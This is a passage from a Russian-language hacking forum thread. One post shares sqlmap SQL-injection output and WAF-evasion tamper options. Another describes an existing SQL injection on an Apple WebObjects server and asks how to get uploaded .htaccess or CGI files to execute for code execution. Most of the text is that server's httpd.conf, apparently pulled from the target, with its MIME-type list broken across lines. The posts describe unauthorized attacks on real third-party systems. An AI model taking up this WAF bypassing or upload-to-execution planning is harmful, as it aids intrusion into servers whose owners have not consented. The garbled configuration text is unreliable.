Старый 26.12.2015, 20:16   #3501
xivi00
 
Регистрация: 18.10.2015
Сообщений: 3
Репутация: 0
По умолчанию

Цитата:
Сообщение от sT1myL Посмотреть сообщение
403 (Forbidden) - 4 times, 404 (Not Found) - 221 times WAF надо использовать скрипты для обхода
вот вывод
[21:13:50] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 50 columns' because the level (5) is higher than the provided (1)
[21:13:50] [DEBUG] skipping test 'MySQL UNION query (random number) - 41 to 50 columns' because the level (5) is higher than the provided (1)
[21:13:50] [WARNING] URI parameter '#1*' is not injectable
[21:13:50] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
[21:13:50] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 36 times, 404 (Not Found) - 200 times
[21:13:50] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

пробовал скрипты "--tamper='between,randomcase,space2comment'" and "-v 3"
xivi00 вне форума   Ответить с цитированием
Старый 13.01.2016, 01:48   #3502
mikhailtpm
 
Аватар для mikhailtpm
 
Регистрация: 01.07.2015
Сообщений: 67
Репутация: 0
По умолчанию

На сервере стоит эппловский Webojects, увы на форуме об этом ни слова. https://developer.apple.com/legacy/library/documentation/WebObjects/Deployment/Deploying_Applications/Deploying_Applications.pdf
Есть sqli, нашел единственую папку, куда можно что-то заливать, но не тут то было. При заливке любых расширений(например .php) тупо их скачивает. Но тут же все на cgi? Но при запросу .cgi выдает 403-ю ошибку Access forbidden!
Что делать в данном случае? Попытаться залить htaccess и попробовать проверить работает ли .cgi? попытка только одна(если заливать htaccess), подскажите что же делать в данном случае)
вот содержимое httpd.conf
PHP код:
# This file created from Leopard Apache 2.2 config file /etc/apache2/httpd.conf.saved-Pre-SnowLeopard-unmodified
# by 61_webconfigmigrator.rb on Sat Feb 13 01:54:35 2010.
# See Log file /Library/Logs/Setup.log
#
# This file created from previous Apache config file //etc/apache2/httpd.conf.Apple-saved
# by updateMIMETypes on Sun Nov  2 13:33:16 2008.
# See Log file //Library/Logs/Migration/webconfigmigrator.log
#
# This file created from previous Apache config file //etc/apache2/httpd.conf.Apple-saved
# by updateMIMETypes on Thu Jul  3 03:51:31 2008.
# See Log file //Library/Logs/Migration/webconfigmigrator.log
#
#### Default httpd.conf for Mac OS X Server, Apache 2.2
####
#### This httpd.conf differs from the httpd.conf distributed
#### with Apache and the httpd.conf present on Mac OS X.
#### Feel free to edit this; the Server Admin app also edits this file but will
#### respect your changes unless noted below. See also ReadMe.txt. 

##
## ServerRoot: The top of the directory tree under which the server's
## configuration, error, and log files are kept.
##
## NOTE!  If you intend to place this on an NFS (or otherwise network)
## mounted filesystem then please read the LockFile documentation
## (available at <URL:http://www.apache.org/docs/mod/core.html#lockfile>);
## you will save yourself a lot of trouble.
##
## Do NOT add a slash at the end of the directory path.
##
##
ServerRoot "/usr"
##
## PidFile: The file in which the server should record its process
## identification number when it starts.
##
PidFile /var/run/httpd.pid
##
## ScoreBoardFile: File used to store internal server process information.
## Not all architectures require this.  But if yours does (you'll know because
## this file will be  created when you run Apache) then you *must* ensure that
## no two invocations of Apache share the same scoreboard file.
##
#ScoreBoardFile "/var/run/apache2_runtime_status"
##
## Server-pool size regulation.  Rather than making you guess how many
## server processes you need, Apache dynamically adapts to the load it
## sees --- that is, it tries to maintain enough server processes to
## handle the current load, plus a few spare servers to handle transient
## load spikes (e.g., multiple simultaneous requests from a single
## Netscape browser).
##
## It does this by periodically checking how many servers are waiting
## for a request.  If there are fewer than MinSpareServers, it creates
## a new spare.  If there are more than MaxSpareServers, some of the
## spares die off.  The default values are probably OK for most sites.
##
MinSpareServers 1
MaxSpareServers 1
##
## Number of servers to start initially --- should be a reasonable ballpark
## figure.
##
StartServers 1
##
## MaxRequestsPerChild: the number of requests each child process is
## allowed to process before the child dies.  The child will exit so
## as to avoid problems after prolonged use when Apache (and maybe the
## libraries it uses) leak memory or other resources.  On most systems, this
## isn't really needed, but a few (such as Solaris) do have notable leaks
## in the libraries. For these platforms, set to something like 10000
## or so; a setting of 0 means unlimited.
##
## NOTE: This value does not include keepalive requests after the initial
##       request per connection. For example, if a child process handles
##       an initial request and 10 subsequent "keptalive" requests, it
##       would only count as 1 request towards this limit.
##
MaxRequestsPerChild 100000
##
## Dynamic Shared Object (DSO) Support
##
## To be able to use the functionality of a module which was built as a DSO you
## have to place corresponding `LoadModule' lines at this location so the
## directives contained in it are actually available _before_ they are used.
## Please read the file http://httpd.apache.org/docs/dso.html for more
## details about the DSO mechanism and run `httpd -l' for the list of already
## built-in (statically linked and thus always available) modules in your httpd
## binary.
##
## Note: The order in which modules are loaded is important.  Don't change
## the order below without expert advice.
##
## Example:
## LoadModule foo_module libexec/mod_foo.so
##
#### For Mac OS X Server: Note that the Server Admin application
#### and the apxs utility enable and disable modules
#### by removing and adding a comment character.
##
LoadModule authn_file_module libexec/apache2/mod_authn_file.so
#LoadModule authn_dbm_module libexec/apache2/mod_authn_dbm.so
#LoadModule authn_anon_module libexec/apache2/mod_authn_anon.so
#LoadModule authn_dbd_module libexec/apache2/mod_authn_dbd.so
#LoadModule authn_default_module libexec/apache2/mod_authn_default.so
LoadModule authz_host_module libexec/apache2/mod_authz_host.so
#LoadModule authz_groupfile_module libexec/apache2/mod_authz_groupfile.so
#LoadModule authz_user_module libexec/apache2/mod_authz_user.so
#LoadModule authz_dbm_module libexec/apache2/mod_authz_dbm.so
#LoadModule authz_owner_module libexec/apache2/mod_authz_owner.so
#LoadModule authz_default_module libexec/apache2/mod_authz_default.so
#LoadModule auth_basic_module libexec/apache2/mod_auth_basic.so
#LoadModule auth_digest_apple_module libexec/apache2/mod_auth_digest_apple.so
LoadModule cache_module libexec/apache2/mod_cache.so
LoadModule mem_cache_module libexec
/apache2/mod_mem_cache.so
LoadModule disk_cache_module libexec
/apache2/mod_disk_cache.so
#LoadModule dbd_module libexec/apache2/mod_dbd.so
LoadModule dumpio_module libexec/apache2/mod_dumpio.so
LoadModule ext_filter_module libexec
/apache2/mod_ext_filter.so
LoadModule include_module libexec
/apache2/mod_include.so
LoadModule filter_module libexec
/apache2/mod_filter.so
LoadModule deflate_module libexec
/apache2/mod_deflate.so
LoadModule log_config_module libexec
/apache2/mod_log_config.so
LoadModule logio_module libexec
/apache2/mod_logio.so
LoadModule env_module libexec
/apache2/mod_env.so
LoadModule expires_module libexec
/apache2/mod_expires.so
LoadModule headers_module libexec
/apache2/mod_headers.so
LoadModule ident_module libexec
/apache2/mod_ident.so
LoadModule setenvif_module libexec
/apache2/mod_setenvif.so
LoadModule proxy_module libexec
/apache2/mod_proxy.so
#LoadModule proxy_connect_module libexec/apache2/mod_proxy_connect.so
#LoadModule proxy_ftp_module libexec/apache2/mod_proxy_ftp.so
LoadModule proxy_http_module libexec/apache2/mod_proxy_http.so
#LoadModule proxy_ajp_module libexec/apache2/mod_proxy_ajp.so
LoadModule proxy_balancer_module libexec/apache2/mod_proxy_balancer.so
LoadModule ssl_module libexec
/apache2/mod_ssl.so
LoadModule mime_module libexec
/apache2/mod_mime.so
#LoadModule mime_magic_module libexec/apache2/mod_mime_magic.so
#LoadModule dav_module libexec/apache2/mod_dav.so
LoadModule status_module libexec/apache2/mod_status.so
LoadModule autoindex_module libexec
/apache2/mod_autoindex.so
LoadModule asis_module libexec
/apache2/mod_asis.so
LoadModule info_module libexec
/apache2/mod_info.so
LoadModule cgi_module libexec
/apache2/mod_cgi.so
#LoadModule dav_fs_module libexec/apache2/mod_dav_fs.so
LoadModule vhost_alias_module libexec/apache2/mod_vhost_alias.so
LoadModule negotiation_module libexec
/apache2/mod_negotiation.so
LoadModule dir_module libexec
/apache2/mod_dir.so
LoadModule imagemap_module libexec
/apache2/mod_imagemap.so
LoadModule actions_module libexec
/apache2/mod_actions.so
LoadModule speling_module libexec
/apache2/mod_speling.so
#LoadModule userdir_module libexec/apache2/mod_userdir.so
#LoadModule apple_userdir_module libexec/apache2/mod_userdir_apple.so
LoadModule alias_module libexec/apache2/mod_alias.so
LoadModule rewrite_module libexec
/apache2/mod_rewrite.so
#LoadModule php5_module libexec/apache2/libphp5.so
#LoadModule encoding_module libexec/apache2/mod_encoding.so
#LoadModule jk_module libexec/apache2/mod_jk.so
#LoadModule bonjour_module libexec/apache2/mod_bonjour.so
LoadModule apple_auth_module libexec/apache2/mod_auth_apple.so
LoadModule spnego_auth_module libexec
/apache2/mod_spnego_apple.so
LoadModule apple_digest_module libexec
/apache2/mod_digest_apple.so
LoadModule hfs_apple_module libexec
/apache2/mod_hfs_apple.so
#LoadModule fastcgi_module libexec/apache2/mod_fastcgi.so
#LoadModule scgi_pubsub_module libexec/apache2/mod_scgi_pubsub.so
#LoadModule dav_svn_module libexec/apache2/mod_dav_svn.so
#LoadModule authz_svn_module libexec/apache2/mod_authz_svn.so
LoadModule auth_user_host_apple_module libexec/apache2/mod_auth_user_host_apple.so
LoadModule auth_session_apple_module libexec
/apache2/mod_auth_session_apple.so
#LoadModule python_module libexec/apache2/mod_python.so
#LoadModule xsendfile_module libexec/apache2/mod_xsendfile.so
## 
## If you wish httpd to run as a different user or group, you must run
## httpd as root initially and it will switch.
##
## User/Group: The name (or #number) of the user/group to run httpd as.
## It is usually good practice to create a dedicated user and group for
## running httpd, as with most system services.
## 
User _www
Group _www
##
## Each directory to which Apache has access, can be configured with respect
## to which services and features are allowed and/or disabled in that
## directory (and its subdirectories). 
##
## First, we configure the "default" to be a very restrictive set of 
## features.  
##
<Directory "/">
    
Options FollowSymLinks
    AllowOverride None
</Directory>
##
## UserDir: The name of the directory which is appended onto a user's home
## directory if a ~user request is received.
##
#### For Mac OS X Server: Note that
#### personal websharing is not supported on Mac OS X Server.
##
<IfModule mod_userdir.c>
    
UserDir Sites
</IfModule>
##
## AccessFileName: The name of the file to look for in each directory
## for access control information.
##
AccessFileName .htaccess
##
## The following lines prevent .htaccess files from being viewed by
## Web clients.
##
#### For Mac OS X Server: Note the case-insensitive pattern, which protects
#### .htaccess fils on HFS volumes.
##
#### (Note: Denying .DS_S* may interfere with Finder WebDAV operation)
##
<Files "^\.([Hh][Tt]|[Dd][Ss]_[Ss])">
    
Order allow,deny
    Deny from all
    Satisfy All
</Files>
#### Block attempts to circumvent access controls by requesting forks.
<Files "rsrc">
    
Order allow,deny
    Deny from all
    Satisfy All
</Files>
<
DirectoryMatch ".*\.\.namedfork">
    
Order allow,deny
    Deny from all
    Satisfy All
</DirectoryMatch>
##
## DefaultType is the default MIME type the server will use for a document
## if it cannot otherwise determine one, such as from filename extensions.
## If your server contains mostly text or HTML documents, "text/plain" is
## a good value.  If most of your content is binary, such as applications
## or images, you may want to use "application/octet-stream" instead to
## keep browsers from trying to display binary files as though they are
## text.
##
##
DefaultType text/plain
<IfModule mod_mime.c>

# TypesConfig points to the file containing the list of mappings from
# filename extension to MIME-type.
#
    
TypesConfig /dev/null
#
#
#AddType application/x-gzip .tgz

# AddEncoding allows you to have certain browsers uncompress
# information on the fly. Note: Not all browsers support this.
#
#AddEncoding x-compress .Z
#AddEncoding x-gzip .gz .tgz
#

# Filters allow you to process content before it is sent to the client.
#
# To parse .shtml files for server-side includes (SSI):
# (You will also need to add "Includes" to the "Options" directive.)
#
#AddOutputFilter INCLUDES .shtml


## Although mod_mime may support several extensions following a single
## mime type (ex: "AddType video/quicktime qt mov"), the parser used
## by the Server Admin application expects only one extension per line.
##      

    
AddHandler send-as-is asis
    AddHandler cgi
-script cgi
    AddHandler fastcgi
-script fcgi
    AddHandler imap
-file map
    AddHandler server
-parsed shtml
    AddHandler type
-map var
    
AddType application/andrew-inset ez
    AddType application
/atom+xml atom
    AddType application
/atomcat+xml atomcat
    AddType application
/atomsvc+xml atomsvc
    AddType application
/ccxml+xml ccxml
    AddType application
/davmount+xml davmount
    AddType application
/ecmascript ecma
    AddType application
/font-tdpfr pfr
    AddType application
/hyperstudio stk
    AddType application
/javascript js
    AddType application
/json json
    AddType application
/mac-binhex40 hqx
    AddType application
/mac-compactpro cpt
    AddType application
/marc mrc
    AddType application
/mathematica ma
    AddType application
/mathematica mb
    AddType application
/mathematica nb
    AddType application
/mathml+xml mathml
    AddType application
/mbox mbox
    AddType application
/mediaservercontrol+xml mscml
    AddType application
/mp4 mp4s
    AddType application
/msword doc
    AddType application
/msword dot
    AddType application
/mxf mxf
    AddType application
/octet-stream bin
    AddType application
/octet-stream bpk
    AddType application
/octet-stream class
    
AddType application/octet-stream dist
    AddType application
/octet-stream distz
    AddType application
/octet-stream dmg
    AddType application
/octet-stream dmgpart
    AddType application
/octet-stream dms
    AddType application
/octet-stream dump
    AddType application
/octet-stream elc
    AddType application
/octet-stream iso
    AddType application
/octet-stream lha
    AddType application
/octet-stream lzh
    AddType application
/octet-stream scpt
    AddType application
/octet-stream so
    AddType application
/oda oda
    AddType application
/ogg ogg
    AddType application
/pdf pdf
    AddType application
/pgp-encrypted pgp
    AddType application
/pgp-signature asc
    AddType application
/pgp-signature sig
    AddType application
/pics-rules prf
    AddType application
/pkcs10 p10
    AddType application
/pkcs7-mime p7c
    AddType application
/pkcs7-mime p7m
    AddType application
/pkcs7-signature p7s
    AddType application
/pkix-cert cer
    AddType application
/pkix-crl crl
    AddType application
/pkix-pkipath pkipath
    AddType application
/pkixcmp pki
    AddType application
/pls+xml pls
    AddType application
/postscript ai
    AddType application
/postscript eps
    AddType application
/postscript ps
    AddType application
/prs.cww cww
    AddType application
/rdf+xml rdf
    AddType application
/reginfo+xml rif
    AddType application
/relax-ng-compact-syntax rnc
    AddType application
/resource-lists+xml rl
    AddType application
/rls-services+xml rs
    AddType application
/rsd+xml rsd
    AddType application
/rss+xml rss
    AddType application
/rtf rtf
    AddType application
/sbml+xml sbml
    AddType application
/sdp sdp
    AddType application
/set-payment-initiation setpay
    AddType application
/set-registration-initiation setreg
    AddType application
/shf+xml shf
    AddType application
/smil+xml smi
    AddType application
/smil+xml smil
    AddType application
/srgs gram
    AddType application
/srgs+xml grxml
    AddType application
/ssml+xml ssml
    AddType application
/vnd.3gpp.pic-bw-large plb
    AddType application
/vnd.3gpp.pic-bw-small psb
    AddType application
/vnd.3gpp.pic-bw-var pvb
    AddType application
/vnd.3m.post-it-notes pwn
    AddType application
/vnd.accpac.simply.aso aso
    AddType application
/vnd.accpac.simply.imp imp
    AddType application
/vnd.acucobol acu
    AddType application
/vnd.acucorp acutc
    AddType application
/vnd.acucorp atc
    AddType application
/vnd.adobe.xdp+xml xdp
    AddType application
/vnd.adobe.xfdf xfdf
    AddType application
/vnd.amiga.ami ami
    AddType application
/vnd.anser-web-certificate-issue-initiation cii
    AddType application
/vnd.anser-web-funds-transfer-initiation fti
    AddType application
/vnd.antix.game-component atx
    AddType application
/vnd.apple.installer+xml mpkg
    AddType application
/vnd.apple.installer+xml pkg
    AddType application
/vnd.audiograph aep
    AddType application
/vnd.blueice.multipass mpm
    AddType application
/vnd.bmi bmi
    AddType application
/vnd.businessobjects rep
    AddType application
/vnd.chemdraw+xml cdxml
    AddType application
/vnd.chipnuts.karaoke-mmd mmd
    AddType application
/vnd.cinderella cdy
    AddType application
/vnd.claymore cla
    AddType application
/vnd.clonk.c4group c4d
    AddType application
/vnd.clonk.c4group c4f
    AddType application
/vnd.clonk.c4group c4g
    AddType application
/vnd.clonk.c4group c4p
    AddType application
/vnd.clonk.c4group c4u
    AddType application
/vnd.commonspace csp
    AddType application
/vnd.commonspace cst
    AddType application
/vnd.contact.cmsg cdbcmsg
    AddType application
/vnd.cosmocaller cmc
    AddType application
/vnd.crick.clicker clkx
    AddType application
/vnd.crick.clicker.keyboard clkk
    AddType application
/vnd.crick.clicker.palette clkp
    AddType application
/vnd.crick.clicker.template clkt
    AddType application
/vnd.crick.clicker.wordbank clkw
    AddType application
/vnd.criticaltools.wbs+xml wbs
    AddType application
/vnd.ctc-posml pml
    AddType application
/vnd.cups-ppd ppd
    AddType application
/vnd.curl curl
    AddType application
/vnd.data-vision.rdz rdz
    AddType application
/vnd.denovo.fcselayout-link fe_launch
    AddType application
/vnd.dna dna
    AddType application
/vnd.dolby.mlp mlp
    AddType application
/vnd.dpgraph dpg
    AddType application
/vnd.dreamfactory dfac
    AddType application
/vnd.ecowin.chart mag
    AddType application
/vnd.enliven nml
    AddType application
/vnd.epson.esf esf
    AddType application
/vnd.epson.msf msf
    AddType application
/vnd.epson.quickanime qam
    AddType application
/vnd.epson.salt slt
    AddType application
/vnd.epson.ssf ssf
    AddType application
/vnd.ezpix-album ez2
    AddType application
/vnd.ezpix-package ez3
    AddType application
/vnd.fdf fdf
    AddType application
/vnd.flographit gph
    AddType application
/vnd.fluxtime.clip ftc
    AddType application
/vnd.framemaker fm
    AddType application
/vnd.framemaker frame
    AddType application
/vnd.framemaker maker
    AddType application
/vnd.frogans.fnc fnc
    AddType application
/vnd.frogans.ltf ltf
    AddType application
/vnd.fsc.weblaunch fsc
    AddType application
/vnd.fujitsu.oasys oas
    AddType application
/vnd.fujitsu.oasys2 oa2
    AddType application
/vnd.fujitsu.oasys3 oa3
    AddType application
/vnd.fujitsu.oasysgp fg5
    AddType application
/vnd.fujitsu.oasysprs bh2
    AddType application
/vnd.fujixerox.ddd ddd
    AddType application
/vnd.fujixerox.docuworks xdw
    AddType application
/vnd.fujixerox.docuworks.binder xbd
    AddType application
/vnd.fuzzysheet fzs
    AddType application
/vnd.genomatix.tuxedo txd
    AddType application
/vnd.google-earth.kml+xml kml
    AddType application
/vnd.google-earth.kmz kmz
    AddType application
/vnd.grafeq gqf
    AddType application
/vnd.grafeq gqs
    AddType application
/vnd.groove-account gac
    AddType application
/vnd.groove-help ghf
    AddType application
/vnd.groove-identity-message gim
    AddType application
/vnd.groove-injector grv
    AddType application
/vnd.groove-tool-message gtm
    AddType application
/vnd.groove-tool-template tpl
    AddType application
/vnd.groove-vcard vcg
    AddType application
/vnd.handheld-entertainment+xml zmm
    AddType application
/vnd.hbci hbci
    AddType application
/vnd.hhe.lesson-player les
    AddType application
/vnd.hp-hpgl hpgl
    AddType application
/vnd.hp-hpid hpid
    AddType application
/vnd.hp-hps hps
    AddType application
/vnd.hp-jlyt jlt
    AddType application
/vnd.hp-pcl pcl
    AddType application
/vnd.hp-pclxl pclxl
    AddType application
/vnd.hzn-3d-crossword x3d
    AddType application
/vnd.ibm.minipay mpy
    AddType application
/vnd.ibm.modcap afp
    AddType application
/vnd.ibm.modcap list3820
    AddType application
/vnd.ibm.modcap listafp
    AddType application
/vnd.ibm.rights-management irm
    AddType application
/vnd.ibm.secure-container sc
    AddType application
/vnd.igloader igl
    AddType application
/vnd.immervision-ivp ivp
    AddType application
/vnd.immervision-ivu ivu
    AddType application
/vnd.intercon.formnet xpw
    AddType application
/vnd.intercon.formnet xpx
    AddType application
/vnd.intu.qbo qbo
    AddType application
/vnd.intu.qfx qfx
    AddType application
/vnd.ipunplugged.rcprofile rcprofile
    AddType application
/vnd.irepository.package+xml irp
    AddType application
/vnd.is-xpr xpr
    AddType application
/vnd.jam jam
    AddType application
/vnd.jcp.javame.midlet-rms rms
    AddType application
/vnd.jisp jisp
    AddType application
/vnd.kahootz ktr
    AddType application
/vnd.kahootz ktz
    AddType application
/vnd.kde.karbon karbon
    AddType application
/vnd.kde.kchart chrt
    AddType application
/vnd.kde.kformula kfo
    AddType application
/vnd.kde.kivio flw
    AddType application
/vnd.kde.kontour kon
    AddType application
/vnd.kde.kpresenter kpr
    AddType application
/vnd.kde.kpresenter kpt
    AddType application
/vnd.kde.kspread ksp
    AddType application
/vnd.kde.kword kwd
    AddType application
/vnd.kde.kword kwt
    AddType application
/vnd.kenameaapp htke
    AddType application
/vnd.kidspiration kia
    AddType application
/vnd.kinar kne
    AddType application
/vnd.kinar knp
    AddType application
/vnd.koan skd
    AddType application
/vnd.koan skm
    AddType application
/vnd.koan skp
    AddType application
/vnd.koan skt
    AddType application
/vnd.llamagraphics.life-balance.desktop lbd
    AddType application
/vnd.llamagraphics.life-balance.exchange+xml lbe
    AddType application
/vnd.lotus-1-2-3 123
    AddType application
/vnd.lotus-approach apr
    AddType application
/vnd.lotus-freelance pre
    AddType application
/vnd.lotus-notes nsf
    AddType application
/vnd.lotus-organizer org
    AddType application
/vnd.lotus-screencam scm
    AddType application
/vnd.lotus-wordpro lwp
    AddType application
/vnd.macports.portpkg portpkg
    AddType application
/vnd.mcd mcd
    AddType application
/vnd.medcalcdata mc1
    AddType application
/vnd.mediastation.cdkey cdkey
    AddType application
/vnd.mfer mwf
    AddType application
/vnd.mfmp mfm
    AddType application
/vnd.micrografx.flo flo
    AddType application
/vnd.micrografx.igx igx
    AddType application
/vnd.mif mif
    AddType application
/vnd.mobius.daf daf
    AddType application
/vnd.mobius.dis dis
    AddType application
/vnd.mobius.mbk mbk
    AddType application
/vnd.mobius.mqy mqy
    AddType application
/vnd.mobius.msl msl
    AddType application
/vnd.mobius.plc plc
    AddType application
/vnd.mobius.txf txf
    AddType application
/vnd.mophun.application mpn
    AddType application
/vnd.mophun.certificate mpc
    AddType application
/vnd.mozilla.xul+xml xul
    AddType application
/vnd.ms-artgalry cil
    AddType application
/vnd.ms-asf asf
    AddType application
/vnd.ms-cab-compressed cab
    AddType application
/vnd.ms-excel xla
    AddType application
/vnd.ms-excel xlc
    AddType application
/vnd.ms-excel xlm
    AddType application
/vnd.ms-excel xls
    AddType application
/vnd.ms-excel xlt
    AddType application
/vnd.ms-excel xlw
    AddType application
/vnd.ms-fontobject eot
    AddType application
/vnd.ms-htmlhelp chm
    AddType application
/vnd.ms-ims ims
    AddType application
/vnd.ms-lrm lrm
    AddType application
/vnd.ms-powerpoint pot
    AddType application
/vnd.ms-powerpoint pps
    AddType application
/vnd.ms-powerpoint ppt
    AddType application
/vnd.ms-project mpp
    AddType application
/vnd.ms-project mpt
    AddType application
/vnd.ms-works wcm
    AddType application
/vnd.ms-works wdb
    AddType application
/vnd.ms-works wks
    AddType application
/vnd.ms-works wps
    AddType application
/vnd.ms-wpl wpl
    AddType application
/vnd.ms-xpsdocument xps
    AddType application
/vnd.mseq mseq
    AddType application
/vnd.musician mus
    AddType application
/vnd.neurolanguage.nlu nlu
    AddType application
/vnd.noblenet-directory nnd
    AddType application
/vnd.noblenet-sealer nns
    AddType application
/vnd.noblenet-web nnw
    AddType application
/vnd.nokia.n-gage.data ngdat
    AddType application
/vnd.nokia.n-gage.symbian.install n-gage
    AddType application
/vnd.nokia.radio-preset rpst
    AddType application
/vnd.nokia.radio-presets rpss
    AddType application
/vnd.novadigm.edm edm
    AddType application
/vnd.novadigm.edx edx
    AddType application
/vnd.novadigm.ext ext
    AddType application
/vnd.oasis.opendocument.chart odc
    AddType application
/vnd.oasis.opendocument.chart-template otc
    AddType application
/vnd.oasis.opendocument.formula odf
    AddType application
/vnd.oasis.opendocument.formula-template otf
    AddType application
/vnd.oasis.opendocument.graphics odg
    AddType application
/vnd.oasis.opendocument.graphics-template otg
    AddType application
/vnd.oasis.opendocument.image odi
    AddType application
/vnd.oasis.opendocument.image-template oti
    AddType application
/vnd.oasis.opendocument.presentation odp
    AddType application
/vnd.oasis.opendocument.presentation-template otp
    AddType application
/vnd.oasis.opendocument.spreadsheet ods
    AddType application
/vnd.oasis.opendocument.spreadsheet-template ots
    AddType application
/vnd.oasis.opendocument.text odt
    AddType application
/vnd.oasis.opendocument.text-master otm
    AddType application
/vnd.oasis.opendocument.text-template ott
    AddType application
/vnd.oasis.opendocument.text-web oth
    AddType application
/vnd.olpc-sugar xo
    AddType application
/vnd.oma.dd2+xml dd2
    AddType application
/vnd.openofficeorg.extension oxt
    AddType application
/vnd.osgi.dp dp
    AddType application
/vnd.palm oprc
    AddType application
/vnd.palm pdb
    AddType application
/vnd.palm pqa
    AddType application
/vnd.palm prc
    AddType application
/vnd.pg.format str
    AddType application
/vnd.pg.osasli ei6
    AddType application
/vnd.picsel efif
    AddType application
/vnd.pocketlearn plf
    AddType application
/vnd.powerbuilder6 pbd
    AddType application
/vnd.previewsystems.box box
    AddType application
/vnd.proteus.magazine mgz
    AddType application
/vnd.publishare-delta-tree qps
    AddType application
/vnd.pvi.ptid1 ptid
    AddType application
/vnd.quark.quarkxpress qwd
    AddType application
/vnd.quark.quarkxpress qwt
    AddType application
/vnd.quark.quarkxpress qxb
    AddType application
/vnd.quark.quarkxpress qxd
    AddType application
/vnd.quark.quarkxpress qxl
    AddType application
/vnd.quark.quarkxpress qxt
    AddType application
/vnd.recordare.musicxml mxl
#        AddType application/vnd.rn-realmedia rm
    
AddType application/vnd.seemail see
    AddType application
/vnd.sema sema
    AddType application
/vnd.semd semd
    AddType application
/vnd.semf semf
    AddType application
/vnd.shana.informed.formdata ifm
    AddType application
/vnd.shana.informed.formtemplate itp
    AddType application
/vnd.shana.informed.interchange iif
    AddType application
/vnd.shana.informed.package ipk
    AddType application
/vnd.simtech-mindmapper twd
    AddType application
/vnd.simtech-mindmapper twds
    AddType application
/vnd.smaf mmf
    AddType application
/vnd.solent.sdkm+xml sdkd
    AddType application
/vnd.solent.sdkm+xml sdkm
    AddType application
/vnd.spotfire.dxp dxp
    AddType application
/vnd.spotfire.sfs sfs
    AddType application
/vnd.sus-calendar sus
    AddType application
/vnd.sus-calendar susp
    AddType application
/vnd.svd svd
    AddType application
/vnd.syncml+xml xsm
    AddType application
/vnd.syncml.dm+wbxml bdm
    AddType application
/vnd.syncml.dm+xml xdm
    AddType application
/vnd.tao.intent-module-archive tao
    AddType application
/vnd.tmobile-livetv tmo
    AddType application
/vnd.trid.tpt tpt
    AddType application
/vnd.triscape.mxs mxs
    AddType application
/vnd.trueapp tra
    AddType application
/vnd.ufdl ufd
    AddType application
/vnd.ufdl ufdl
    AddType application
/vnd.uiq.theme utz
    AddType application
/vnd.umajin umj
    AddType application
/vnd.unity unityweb
    AddType application
/vnd.uoml+xml uoml
    AddType application
/vnd.vcx vcx
    AddType application
/vnd.visio vsd
    AddType application
/vnd.visio vss
    AddType application
/vnd.visio vst
    AddType application
/vnd.visio vsw
    AddType application
/vnd.visionary vis
    AddType application
/vnd.vsf vsf
    AddType application
/vnd.wap.wbxml wbxml
    AddType application
/vnd.wap.wmlc wmlc
    AddType application
/vnd.wap.wmlscriptc wmlsc
    AddType application
/vnd.webturbo wtb
    AddType application
/vnd.wordperfect wpd
    AddType application
/vnd.wqd wqd
    AddType application
/vnd.wt.stf stf
    AddType application
/vnd.xara xar
    AddType application
/vnd.xfdl xfdl
    AddType application
/vnd.yamaha.hv-dic hvd
    AddType application
/vnd.yamaha.hv-script hvs
    AddType application
/vnd.yamaha.hv-voice hvp
    AddType application
/vnd.yamaha.smaf-audio saf
    AddType application
/vnd.yamaha.smaf-phrase spf
    AddType application
/vnd.yellowriver-custom-menu cmp
    AddType application
/vnd.zzazz.deck+xml zaz
    AddType application
/voicexml+xml vxml
    AddType application
/winhlp hlp
    AddType application
/wsdl+xml wsdl
    AddType application
/wspolicy+xml wspolicy
    AddType application
/x-ace-compressed ace
    AddType application
/x-apple-aspen-config mobileconfig
    AddType application
/x-bcpio bcpio
    AddType application
/x-bittorrent torrent
    AddType application
/x-bzip bz
    AddType application
/x-bzip2 boz
    AddType application
/x-bzip2 bz2
    AddType application
/x-cdlink vcd
    AddType application
/x-chat chat
    AddType application
/x-chess-pgn pgn
    AddType application
/x-cpio cpio
    AddType application
/x-csh csh
    AddType application
/x-director dcr
    AddType application
/x-director dir
    AddType application
/x-director dxr
    AddType application
/x-director fgd
    AddType application
/x-dvi dvi
    AddType application
/x-futuresplash spl
    AddType application
/x-gtar gtar
    AddType application
/x-hdf hdf
    AddType application
/x-httpd-php php
    AddType application
/x-httpd-php-source phps
    AddType application
/x-httpd-php3 php3
    AddType application
/x-java-jnlp-file jnlp
    AddType application
/x-latex latex
    AddType application
/x-mpegURL m3u8
    AddType video
/MP2T ts
    AddType application
/x-ms-wmd wmd
    AddType application
/x-ms-wmz wmz
    AddType application
/x-msaccess mdb
    AddType application
/x-msbinder obd
    AddType application
/x-mscardfile crd
    AddType application
/x-msclip clp
    AddType application
/x-msdownload bat
    AddType application
/x-msdownload com
    AddType application
/x-msdownload dll
    AddType application
/x-msdownload exe
    AddType application
/x-msdownload msi
    AddType application
/x-msmediaview m13
    AddType application
/x-msmediaview m14
    AddType application
/x-msmediaview mvb
    AddType application
/x-msmetafile wmf
    AddType application
/x-msmoney mny
    AddType application
/x-mspublisher pub
    AddType application
/x-msschedule scd
    AddType application
/x-msterminal trm
    AddType application
/x-mswrite wri
    AddType application
/x-netcdf cdf
    AddType application
/x-netcdf nc
    AddType application
/x-pkcs12 p12
    AddType application
/x-pkcs12 pfx
    AddType application
/x-pkcs7-certificates p7b
    AddType application
/x-pkcs7-certificates spc
    AddType application
/x-pkcs7-certreqresp p7r
    AddType application
/x-quicktimeplayer qtl
    AddType application
/x-rar-compressed rar
    AddType application
/x-sh sh
    AddType application
/x-shar shar
    AddType application
/x-shockwave-flash swf
    AddType application
/x-stuffit sit
    AddType application
/x-stuffitx sitx
    AddType application
/x-sv4cpio sv4cpio
    AddType application
/x-sv4crc sv4crc
    AddType application
/x-tar tar
    AddType application
/x-tar tgz
    AddType application
/x-tcl tcl
    AddType application
/x-tex tex
    AddType application
/x-texinfo texi
    AddType application
/x-texinfo texinfo
    AddType application
/x-ustar ustar
    AddType application
/x-wais-source src
    AddType application
/x-x509-ca-cert crt
    AddType application
/x-x509-ca-cert der
    AddType application
/xenc+xml xenc
    AddType application
/xhtml+xml xht
    AddType application
/xhtml+xml xhtm
    AddType application
/xhtml+xml xhtml
    AddType application
/xml xml
    AddType application
/xml xsl
    AddType application
/xml-dtd dtd
    AddType application
/xop+xml xop
    AddType application
